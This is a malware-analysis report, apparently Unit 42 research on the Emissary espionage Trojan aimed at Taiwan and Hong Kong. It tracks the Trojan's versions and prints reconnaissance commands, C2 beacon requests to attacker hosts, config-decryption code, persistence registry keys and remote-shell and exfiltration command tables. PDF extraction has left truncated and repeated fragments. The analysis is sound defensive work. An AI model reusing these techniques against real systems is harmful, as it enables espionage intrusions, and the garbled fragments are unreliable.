### 6 **attack campaign, which prompted us to start collecting additional samples of Emissary.** **The oldest sample we found was created in 2009, indicating this tool has been in use for almost** **seven years. Of note, this is three years earlier than the oldest Elise sample we have found,** **suggesting this group has been active longer than previously documented. In addition,** **Emissary appears to only be used against Taiwanese or Hong Kong based targets, all of the** **decoys are written in Traditional Chinese, and they use themes related to the government or** **military.** **We also found several different versions of Emissary that had several iterative changes that** **show how the Trojan evolved over the years. One of the most interesting observations made** **during this analysis is that the amount of development effort devoted to Emissary significantly** **[increased after we published our Operation Lotus Blossom report in June 2015, resulting in](http://researchcenter.paloaltonetworks.com/2015/06/operation-lotus-blossom/)** **many new versions of the Emissary Trojan. In addition, we observed a TTP shift post publication** **with regards to their malware delivery; they started using compromised but legitimate domains** **to serve their malware. Interestingly, the C2 infrastructure is also somewhat different than that** **used by Elise.** **In contrast to Elise, which was used in attacks against multiple Southeast Asian countries in** **region appropriate languages, all of the Emissary decoys we’ve collected are written in** **Traditional Chinese, which is used primarily in Taiwan and Hong Kong. The targets we have** **identified are also limited to those two regions. Despite appearing to target a more limited** **geographical range, Emissary targeted the government, higher education, and high tech** **companies with a mix of copy and pasted news articles and documents that do not appear to be** **available online. Decoys include:** **An Excel spreadsheet containing legitimate contact information for much of the Taiwanese** **government that does not appear to be available online.** **Copy and paste of a news article where the Deputy Commander of the Nanjing Military** **region, Wang Huanguang, responds negatively to a 2014 magazine article from a respected** **US Taiwan scholar saying the odds of China and Taiwan reuniting is low and discussing the** **issues with an attempted military takeover.** **Copy of a news article from 2010 about the Chinese League of Victims protesting the** **involuntary removal of Shanghai residents in the lead up to the Shanghai Expo.** **Copy of the official Taiwan holiday schedule for 2016, which is the 105[th] anniversary of the** **current Taiwanese government.** |Col1|POSTED BY: Robert Falcone and Jen Miller-Osborn on February 3, 2016 11:00 AM| |---|---| |6|| |LLiikkee|FILED IN: Malware, Threat Prevention, Unit 42 TAGGED: AutoFocus, cyber espionage, cybersecurity, Elise, Emissary, Espionage, Lotus Blossom, Trojans In December 2015, Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload. Emissary is related to the Elise Trojan and the Operation Lotus Blossom attack campaign, which prompted us to start collecting additional samples of Emissary.| |Tweet|| |2|| ## Palo Alto Networks News of the Week – May 14 **[posted by Anna Lough on May 14, 2016](http://researchcenter.paloaltonetworks.com/author/anna-lough/)** ## Japan’s Cybersecurity Guidelines for Business Leadership – Changing the Japanese Business Mindset and Potentially Raising the Global Bar **[posted by Mihoko Matsubara on May 13, 2016](http://researchcenter.paloaltonetworks.com/author/mihoko-matsubara/)** ## A Word on Endpoint Security (For Those In the Know) **[posted by Sebastian Goodwin on May 13, 2016](http://researchcenter.paloaltonetworks.com/author/sebastian-goodwin/)** ## Winning Together in the Commercial Market **[posted by Ron Myers on May 13, 2016](http://researchcenter.paloaltonetworks.com/author/ron-myers/)** ## Palo Alto Networks Signs Coordinated Vulnerability Disclosure Manifesto, Showcasing Industry’s Contributions to EU Cybersecurity Efforts **[posted by Rene Bonvanie on May 12, 2016](http://researchcenter.paloaltonetworks.com/author/rene/)** **[MORE →](http://researchcenter.paloaltonetworks.com/archives/)** **Select a Category** **Select a Month** **[MORE →](http://researchcenter.paloaltonetworks.com/archives/)** ## 2 ----- **Figure 1: Partial screenshot of the response from Deputy Commander of the Nanjing Military** **Region Wang Huangguang.** **We’ve expanded our knowledge of Emissary infrastructure significantly since our first Emissary** **blog and we’ve found almost exclusive use of Dynamic DNS (DDNS) domains with only one** **purchased from a Chinese reseller. In contrast, the Elise samples used a mix of actor-registered** **and DDNS, with the actor-registered serving as one of the data points we used to tie all of the** **activity together. While the use of DDNS can make tying activity together more difficult, and** **despite the new Emissary variants since our publication, two of the most recent C2s resolved to** **IPs used by Elise C2s detailed in Operation Lotus Blossom. The Emissary samples typically** **have three hardcoded C2s that are a mix of IPs and domain names, with one of the domains or** **IPs not being used by the other three C2s in a likely effort to avoid loss of control. A full IOC list** **is included at the end of this report.** **Also new is the actors’ use of compromised legitimate Taiwanese websites to serve their** **malware, including the official website of the Democratic Progressive Party. This is particularly** **interesting as Taiwan just held a closely watched Presidential election on 16 January where** **DPP candidate Tsai Ing-wen won. This marked the first time a woman was elected President of** **Taiwan and only the second time a member of the Kuomintang did not hold the office since** **being ousted from China in 1949 when the Communist Party of China took power. In line with** **her party’s stance, she is widely seen as a proponent of an independent Taiwan and not in favor** **of reunification with the People’s Republic of China.** **Our evidence suggests that malware authors created Emissary as early as 2009, which** **suggests that threat actors have relied on this tool as a payload in cyber-espionage attacks for** **many years. The Emissary Trojan is a capable tool to gain a foothold on a targeted system.** **While it lacks more advanced functionality like screen capturing, it is still able to carry out most** **tasks desired by threat actors: exfiltration of files, ability to download and execute additional** **payloads, and gain remote shell access. It appears that threat actors have continually used this** **Trojan, and developed several updated versions of Emissary to remain undetected and fresh** **over time.** **We analyzed all of the known Emissary samples to determine what changes the malware author** **made between the different versions of the Trojan. During our analysis, we examined when** **each sample was created based on its compile time and produced a simple timeline, seen in** **Figure 2, to display the development efforts expended on the Emissary Trojan. It should be** **noted that we know some Emissary samples have been used multiple times with different** **configurations, so the timeline only shows when development activity took place on Emissary** **and should not be misconstrued to when Emissary was used in attacks.** **The timeline in Figure 2 shows that the Emissary Trojan was first created (version 1.0) in May** **2009 and quickly received an update that resulted in version 1.1 in June 2009. The Trojan did** **not receive much in the form of updates until September 2011 when the author released version** **2.0. Version 2.0 received one update in October 2013 before the malware author released** **version 3.0 in December 2014. The malware author released version 4.0 in March 2015, but** **curiously created a version 3.0 sample afterwards on June 26, 2015, which was out-of-** **sequence from the incrementing versioning. Between August and November 2015 the malware** **author creates several new versions of Emissary, specifically 5.0, 5.1, 5.3 and 5.4 in a much** ----- ----- **Figure 2: Timeline of development efforts spent on Emissary** **The out-of-sequence version 3.0 appears to be an early variant of version 5.0 based on** **significant similarities (discussed in the changelog section) that are not seen in the original** **version 3.0 and other earlier versions of Emissary. One campaign code associated with of the** **out-of-sequence version 3.0 sample was “3test”, suggesting the malware author created it for** **testing purposes. The other campaign code associated with the out-of-sequence sample was** **“IC00001”, which could denote an attack payload as it appears to be a plausible code to** **describe a campaign.** **While this may be coincidental, the out-of-sequence version 3.0 sample was created ten days** **[after we published the Operation Lotus Blossom paper that exposed the Elise Trojan that is](http://researchcenter.paloaltonetworks.com/2015/06/operation-lotus-blossom/)** **closely related to Emissary. It is possible that the threat actors were prompted to make malware** **changes in response to our research. Regardless of causation, the rapid development of new** **versions of Emissary suggests that the malware authors are making frequent modifications to** **evade detection, which as a corollary suggests the threat actors are actively using the Emissary** **Trojan as a payload in attacks.** **In this section, we discuss the changes observed between each version of Emissary. As this** **section is focused on changes, the features and functionality are the same between Emissary** **versions unless otherwise mentioned.** **Date: 5/12/2009** **SHA256: a7d07b92e48876e2195e5d8769a47cf0a237e11ac304e41b14fc36042b0d9484** **Original Name: WUMsvc.dll** **Initial Release** **The initial loader Trojan writes Emissary to %SYSTEM%\WSPsvc.dll and installs it as a service,** **which will run the exported function “ServiceMain” within the Emissary Trojan to carry out its** **functionality.** **Configuration data is stored in the last 1024 bytes of the payload, from which the Trojan will** **extract an 896 byte structure. The configuration is decrypted with an algorithm that uses the** **XOR operation on each byte using the value at a different offset within the ciphertext.** **The code will create the following registry keys:** **1** **2** **HKEY_CLASSES_ROOT\Shell.LocalServer\CheckCode** **HKEY_CLASSES_ROOT\Shell.LocalServer\CheckID** ----- **The malware performs initial system information gathering and saves data to a file named** **TMP2548. The initial gathering relies on a combination of the following commands executed by** **the command prompt:** **1** **2** **3** **4** **5** **6** **7** **8** **9** **10** **11** **12** **13** **14** **15** **16** **commands executed by the command prompt:** **ECHO VER** **VER** **ECHO IPCONFIG /ALL** **IPCONFIG /ALL** **ECHO NET LOCALGROUP ADMINISTRATORS** **NET LOCALGROUP ADMINISTRATORS** **ECHO NET START** **NET START** **ECHO GPRESULT /Z** **GPRESULT /Z** **ECHO GPRESULT /SCOPE COMPUTER /Z** **GPRESULT /SCOPE COMPUTER /Z** **ECHO SYSTEMINFO** **SYSTEMINFO** **Emissary parses command and control responses for “instru”, which will precede a GUID value** **that designates the command the C2 server wishes to execute on the system. The command** **handler does not use a nested if/else or switch statement like most malware families, instead** **Emissary creates a structure that contains all of the available command GUIDs that it will iterate** **through each time the C2 supplies a GUID in order to determine which command the operator** **wishes to execute. Emissary can include up to 32 different commands within this data structure,** **but it appears the author has decided to include six commands within the Trojan. The following** **denotes the command handler structure used by Emissary v1.0:** **1** **2** **3** **4** **5** **6** **7** **8** **9** **10** **11** **12** **13** **14** **15** **16** **17** **18** **19** **20** **struct** **EMISSARY_COMMAND** **{** **CHAR** **guid[40];** **DWORD sub_function;** **DWORD arg1_subfunction;** **DWORD arg2_subfunction;** **DWORD arg3_subfunction;** **};** **struct** **commandHandler** **{** **DWORD number_of_commands;** **DWORD unused;** **struct** **EMISSARY_COMMAND cmd_0;** **struct** **EMISSARY_COMMAND cmd_1;** **struct** **EMISSARY_COMMAND cmd_2;** **struct** **EMISSARY_COMMAND cmd_3;** **struct** **EMISSARY_COMMAND cmd_4;** **struct** **EMISSARY_COMMAND cmd_5;** **};** **Table 1 contains the commands available within the Emissary v1.0 command handler.** **Command** **Description** **bac84b12-5b0b-491f-a885-** **8667d156394f** **3d8313cc-53ca-4751-bbbf-** **ea5f914f8e65** **db0e93e7-b46c-4cba-81f1-** **ec70da57dc19** **2e382e51-3089-4293-8454-** **5eccb253eb54** **a57db08a-bf97-4b43-b27d-** **157e62e2fd74** **eab5c1ab-a497-4fc2-bbe0-** **049be45d6f2d** **Upload file.** **Download file.** **Update config. C2 specifies files as: p1 = C2 server** **1, p2 = C2 server 2, p3 = C2 server 3, p4 = Sleep** **Interval, p5 = System Identifier (computer name), p6** **= GUID for beacon.** **Executes a specified command.** **Create remote shell.** **Update Trojan with new executable.** ----- **The Emissary version 1.0 beacon to the C2 server appears as follows:** **1** **2** **3** **4** **GET /VSNET/default.aspx HTTP/1.1** **User-Agent: Mozilla/4.0** **Host: 193.34.144[.]21** **Cookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678;** **op=1635b097-ffe4-** **Date: 5/31/2009** **SHA256: e6c4611b1399ada920730686395d6fc1700fc39add3d0d40b4f784ccb6ad0c30,** **Original Name: WUMsvc.dll** **Removed checks for “//” and “/” in the update configuration command when updating the three** **C2 servers.** **Date: 6/5/2009** **SHA256: 931a1284b11a3997c7a99076d582ed3436aa30409dc73bd763436dddd490f9cb** **Original Name: WUMsvc.dll** **Bug fixes:** **Added code to make sure the content received from the C2 server matches the “Content-** **Length” value in the HTTP response.** **Code added to allow for the download of more than 524,288 bytes.** **The Emissary v1.1 C2 beacon appears as follows, which has not changed since version 1.0:** **1** **2** **3** **4** **GET /eng/comfunc/comfunc/default.aspx HTTP/1.1** **User-Agent: Mozilla/4.0** **Host: 137.189.145.1** **Cookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678;** **op=1635b097-ffe4-** **Date: 9/15/2011** **SHA256: 5edf2d0270f8e7eb5be3476802e46c578c4afc4b046411be0806b9acc3bfa099 Original** **Name: EmissaryDll.dll** **Version 2.0 was a significant re-write of the Emissary Trojan.** **The configuration data for the Trojan is still saved to the registry, but the registry key has** **changed to:** **1** **SOFTWARE\Microsoft\VBA\VbaData** **The configuration structure also changed in size to 464 bytes. The Emissary configuration is** **now encrypted using a custom algorithm that uses the “srand” function to seed the “rand”** **function using a value of 2563. This seed value causes the “rand” function to generate the same** **values each time, which Emissary will use as a key along with the XOR operation. The** **configuration now contains the version number of Emissary, instead of the version being** **hardcoded into the Trojan.** **This version of Emissary keeps track of which C2 location within its configuration that it has** **been communicating with by storing the index of the C2 server (1, 2, or 3) in the following** **registry key:** **1** **SOFTWARE\Microsoft\VBA\VbaList** **This version of Emissary moves away from the command handler using the structure and** **moves to a nested if/else statement for less complicated command handling; however, the** **command GUID and commands themselves are unchanged.** **The Emissary version 2.0 beacon changed slightly from previous versions, specifically the** **removal of the User-Agent field and the use of a lowercase “h” in the “Host” field. The following** **is an example of the version 2.0 beacon, which contains the same GUID and “op” values:** **1** **2** **3** **GET /0test/test/default.aspx HTTP/1.1** **host: 163.20.127.27** **Cookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678;** **op=1635b097-ffe4-** **Version 2.0 also introduces a debug message logging system that includes verbose error** **messages that are accompanied by an error ID number. Error messages are written to the file** **%TEMP%\em.log. The following is a list of all possible debug messages:** ----- **4** **5** **6** **7** **8** **9** **10** **11** **12** **13** **14** **15** **16** **17** **18** **19** **20** **21** **22** **23** **24** **25** **26** **27** **28** **29** **30** **31** **32** **33** **34** **35** **36** **37** **38** **39** **40** **41** **42** **43** **44** **45** **46** **47** **48** **49** **50** **51** **52** **53** **54** **55** **56** **57** **58** **59** **60** **61** **62** **63** **64** **y** **pp** **pp()** **emissarydll.cpp - 0x3b - InitApp() - create work thread** **shell.cpp - 0x30 - SendShellOutputThread - PeekNamedPipe - Error :** **shell.cpp - 0x3e - SendShellOutputThread() : Timeout** **shell.cpp - 0x53 - SendShellOutputThread - ReadFile - Error : 0x%08** **shell.cpp - 0x5b - SendShellOutputThread - send - Error : 0x%08x** **shell.cpp - 0x62 - SendShellOutputThread() : thread exit** **shell.cpp - 0x7f - RecvShellCmdThread - recv - Error : 0x%08x** **shell.cpp - 0x89 - RecvShellCmdThread - WriteFile - Error : 0x%08x** **shell.cpp - 0x8f - RecvShellCmdThread() : thread exit** **shell.cpp - 0xeb - Error occured : %s** **[%d]** **shell.cpp - 0xfa - TerminateThread Input Thread** **shell.cpp - 0x100 - TerminateThread Output Thread** **shell.cpp - 0x118 - SocketShell - Fail To** **Create Reverse Socket** **shell.cpp - 0x12f - SocketShell - Fail To** **Generate Reverse Shell** **shell.cpp - 0x13a - SocketShell - SocketShell - Fail To** **Generate R** **shell.cpp - 0x13e - SocketShell - Create Reverse Shell Thread OK** **config.cpp - 0x38 - RegCreateKeyEx error : %0x08x** **config.cpp - 0x46 - RegSetValueEx error : %0x08x** **config.cpp - 0x5e - ReadConfig - RegCreateKeyEx error : 0x%08x** **config.cpp - 0x66 - ReadConfig - RegQueryValueEx error : 0x%08x** **config.cpp - 0xab - find user: %s** **config.cpp - 0xbc - can not** **find proxy** **config.cpp - 0xc7 - get ProxySetting failed** **config.cpp - 0xd4 - find proxy server : %s** **run.cpp - 0x75 - InitConfig: [g_ServerPath:%s]** **[g_ServerName:%** **run.cpp - 0x9d - InitConfig: [g_DelayTime:%d]** **run.cpp - 0xbe - get proxy the last time used:%s** **run.cpp - 0xc3 - server index:%d** **run.cpp - 0xd9 - RetryTimes = %d** **run.cpp - 0xec - connect %s** **error :%s** **run.cpp - 0x10c - process** **a** **request ok.** **httpclient.cpp - 0x98 - ASP.NET_SessionId⻓度[异常]:[%d][%s]** **(translati** **httpclient.cpp - 0xd0 - ******not** **connected !** **httpclient.cpp - 0xf4 - read hread error : %s** **httpclient.cpp - 0x102 - body length = 0** **httpclient.cpp - 0x13d - decrypt error"** **httpclient.cpp - 0x211 - instruction : ** **httpclient.cpp - 0x21d - no instruction guid** **httpclient.cpp - 0x22c - OP_DOWNLOAD no local file name** **httpclient.cpp - 0x23b - OP_UPLoad no local file name** **httpclient.cpp - 0x249 - OP_UPLoad no local file name** **httpclient.cpp - 0x242 - OP_UPLoad no local file name** **httpclient.cpp - 0x25b - OP_EXECUTE no cmd list** **httpclient.cpp - 0x262 - OP_EXECUTE no timeout** **httpclient.cpp - 0x2b4 - OP_SHELL ip** **httpclient.cpp - 0x2bb - OP_SHELL port** **httpclient.cpp - 0x2dd - OP_CHANGECONFIG server1** **httpclient.cpp - 0x2e4 - OP_CHANGECONFIG server2** **httpclient.cpp - 0x2eb - OP_CHANGECONFIG server3** **httpclient.cpp - 0x2f2 - OP_CHANGECONFIG timestr** **httpclient.cpp - 0x2f9 - OP_CHANGECONFIG namestr** **httpclient.cpp - 0x300 - OP_CHANGECONFIG guid** **httpclient.cpp - 0x321 - not** **connected** **httpclient.cpp - 0x361 - send msg error** **httpdoinstruction.cpp - 0x28 - DownloadFile - LocalFileName=%s** **httpdoinstruction.cpp - 0x5c - download file http head:%s** **httpdoinstruction.cpp - 0x7a - download file ok** **httpdoinstruction.cpp - 0xac - UploadFile - LocalFileName=%s** **httpdoinstruction.cpp - 0xb4 - DownloadFile - Error - Open File** **[%S** **httpdoinstruction.cpp - 0xc7 - UploadFile:TotalLength=%d** **httpdoinstruction.cpp - 0x124 - download file http head:%s** **Date: 10/24/2013** **SHA256: 9dab2d1b16eb0fb4ec2095d4b4e2a3ad67a707ab4f54f9c26539619691f103f3** **Original Name: NetPigeon_DLL.dll** **This update to Emissary allowed the Trojan to run as a service. The configuration now contains** **settings for the Emissary service, which the Trojan will store in and access from the following** **registry keys:** **SOFTWARE\Microsoft\VBA\Serv -> Service Name** **SOFTWARE\Microsoft\VBA\VbaList -> Binary Path for the Service** **Also, this version of Emissary was created using Microsoft Foundation Classes (MFC) to carry** **out a majority of its functionality. For instance, instead of manually building an HTTP request as** **in previous versions, this version uses the MFC functions to create the HTTP request and send** **it to the C2 server:** **CInternetSession::CInternetSession** **CInternetSession::GetHttpConnection** **CHttpConnection::OpenRequest** **CHttpFile::AddRequestHeaders** **CInternetSession::SetCookie** **CHttpFile::SendRequest** ----- **within the HTTP header:** **1** **2** **3** **4** **5** **GET /lightserver/Default.aspx HTTP/1.0** **Cache-Control: no-cache** **User-Agent: Mozilla/4.0** **(compatible;** **MSIE** **7.0;** **Windows NT** **5.1)** **Host: groupspace.findhere.org** **Cookie: guid=8E550BBD-F5DB-4471-BBC7-E8768BD5003E;** **op=1635b097-ffe4-** **The logging functionality within this update no longer includes error ID values, but still contains** **verbose debug messages that are written to a file named %TEMP%\msmqinst.ax.** **Date: 12/24/2014** **SHA256: dcbeca8c92d6d18f2faf385e677913dc8abac3fa3303c1f5cfe166180cffbed3** **Original Name: Generic.dll** **Bug fixes:** **Added a function to the configuration update command that checks to see if the C2 provided** **a new sleep interval at offset 460 and uses the interval stored in the VbaData registry key if** **its missing. This fixes the bug that would not allow the sleep interval to update correctly.** **Date: 3/26/2015** **SHA256: 5171c9a593389011da4d72125e52bf7ef86b2da7fcd6c2a2bc95467afe6a1b58** **Original Name: Generic.dll** **This version of Emissary includes both the installation and loading functionality along with the** **Emissary functional code in the same file. The installation and loading portion of the Trojan is** **called using an exported function named “Setting”, which moves the file to:** **1** **%TEMP%\Remdisk.dll** **The loading portion of this version of Emissary checks the permissions of the current user and** **either installs Emissary as a service or as a standalone Trojan. To install as a service, the loader** **will enumerate the services on the system looking for services running under the “netsvcs”** **group, and it will attempt to hijack the first “netsvcs” service by replacing the “ServiceDLL”** **parameter to point to the Emissary DLL. For instance, during the analysis period, the installation** **code changed the following registry key of the AppMgmt:** **1** **HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters\ServiceDll** **to** **1** **HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters\ServiceDll** **If the user does not have permissions to add a service, the installation routine attempts to add** **persistence by creating the following registry key that will run the functional code within** **Emissary via an exported function named “DllRegister”:** **1** **Software\Microsoft\Windows\CurrentVersion\Run\Resolves: "Rundll32.ex** **This version of emissary has its configuration appended to the end of the DLL, specifically** **starting at offset 0xc600. The following code accesses the configuration embedded within the** **DLL and decrypts it using a single byte XOR algorithm using 65 as the key:** **1** **2** **3** **4** **5** **6** **SetFilePointer(v2,** **0xC600,** **0,** **0);** **ReadFile(h_emissary_dll_file,** **buffer_for_config,** **0x1D0u, &NumberOfBy** **iteration_count = 0;** **do** ***(iteration_count++ + buffer_for_config) += 65;** **while** **(** **iteration_count < 0x1D0** **);** **This algorithm differs from the algorithm introduced in Emissary version 2.0 that used the srand** **and rand functions to generate a key to use in conjunction with the XOR operation. With the** **configuration embedded within the Emissary DLL, each Emissary version 4.0 sample will have a** **different hash as the configuration data changes.** **The network beacon sent from Emissary version 4.0 is the same as other previous versions** **starting at version 2.0, as seen in the following:** **1** **2** **3** **4** **5** **GET /lightserver/Default.aspx HTTP/1.0** **Cache-Control: no-cache** **User-Agent: Mozilla/4.0** **(compatible;** **MSIE** **7.0;** **Windows NT** **5.1)** **Host: 210.209.121.92** **Cookie: guid=7DA53AE4-C155-40b3-8EB3-60C4FCE99025;** **op=1635b097-ffe4-** ----- **Date: 6/25/2015** **SHA256: 70bed57bc3484fe5dbcf3c732bd7b11f80a742138f4733bc7e9b6d03e721da4a** **Original Name: IISDLL.dll** **Major Overhaul** **The compilation time of one sample of Emissary version 3.0 on June 25, 2015 appears out of** **order, as it occurs after the compilation of Emissary version 4.0. The differences between this** **out of order sample compared to the other known version 3.0 sample, as well as version 4.0 for** **that matter, include a dramatic change in configuration storage and the handling of commands.** **Also, the files stored on the system have different names than Emissary versions in the past,** **which are:** **1** **2** **3** **4** **5** **%TEMP%\000IISA758C8FEAE5F.TMP -> Log** **file** **%APPDATA%\LocalData\75BD50EC.DAT -> Configuration** **file** **%APPDATA%\LocalData\A08E81B411.DAT -> Emissary DLL** **This version of Emissary is designed to be injected into an Internet Explorer process by its** **associated loader Trojan, which marks the first time Emissary executes through DLL injection.** **This version of Emissary also has a different configuration structure than prior versions. The** **configuration is no longer stored in the registry; rather it is saved to a file named** **75BD50EC.DAT. The Emissary DLL will skip to offset 0x488 within this file and read the next 132** **bytes, which it will decrypt with a new algorithm as seen in the following:** **1** **2** **3** **4** **5** **6** **7** **8** **SetFilePointer(h_config_file_1,** **0x488,** **0,** **0);** **ReadFile(h_config_file,** **buffer_for_config,** **132u, &NumberOfBytesRead,** **CloseHandle(h_config_file);** **srand(0xA03u);** **iteration_count = 0;** **do** ***(buffer_for_config + iteration_count++) ^= rand() % 128;** **while** **(** **iteration_count < 0x84** **);** **The configuration structure has also changed as well, with Emissary now using the following** **structure:** **1** **2** **3** **4** **5** **6** **7** **8** **9** **10** **11** **12** **struct** **emissary_new_config** **{** **WORD** **Emissary_version_major;** **WORD** **Emissary_version_minor;** **CHAR[36]** **GUID_for_sample;** **WORD** **Unknown1;** **CHAR[128]** **Server1;** **CHAR[128]** **Server2;** **CHAR[128]** **Server3;** **CHAR[128]** **CampaignName;** **CHAR[550]** **Unknown2;** **WORD** **Delay_interval_seconds;** **};** **This version of Emissary also introduced a new command handler that uses number-based** **commands instead of the GUID commands seen in prior versions of Emissary. The functionality** **of the commands are the same, however, the commands themselves are invoked using a** **number. Table 2 contains a list of available commands and a brief description of the functionality** **carried out by the command.** **Command** **Description** **102** **Upload a file to the C2 server.** **103** **Executes a specified command.** **104** **Download file from the C2 server.** **105** **Update configuration file.** **106** **Create a remote shell.** **107** **Updates the Trojan with a new executable.** **Table 2: New Emissary command handler** **The network beacon sent from this version of Emissary is very similar to the beacon first** **introduced in Emissary version 2.0; however, the “op” value of “101” is hardcoded for the** **beacon and replaces the GUID based op designator to match the new command handler The** ----- **4** **5** **Cache-Control: no-cache** **Cookie: guid=cae5e213-395a-4023-9a12-f78d3c4718e5;** **op=101** **Date: 8/25/2015** **SHA256: c145bb2e4ce77c79aa01de2aec4a8b5b0b680e23bceda2c230903b5f0e119634,** **Original Name: WinDLL.dll** **Emissary version 5.0 closely resembles the out-of-order version 3.0 sample, which suggests** **that the malware author just forgot to change the version number of the out of order sample.** **While the configuration and Emissary DLL filenames used by the version 5.0 Emissary sample** **are the same as the out-of-order version 3.0 sample, the log file name differs but only slightly, as** **seen in the following list of related files:** **1** **2** **3** **4** **5** **6** **7** **%TEMP%\000A758C8FEAE5F.TMP -> Log** **File** **%APPDATA%\LocalData\75BD50EC.DAT -> Configuration** **file** **%APPDATA%\LocalData\A08E81B411.DAT -> Emissary** **DLL** **%APPDATA%\LocalData\ishelp.dll -> Loader DLL** **Version 5.0 uses numbers within its command handler and the same configuration structure as** **the out-of-order version 3.0. The only major change in 5.0 is the ability to obtain a compromised** **system’s external IP address by performing an HTTP GET request to** **“http://showip.net/index.php”. The code will parse the response from this webserver for the** **following to obtain the system’s IP address:** **1** **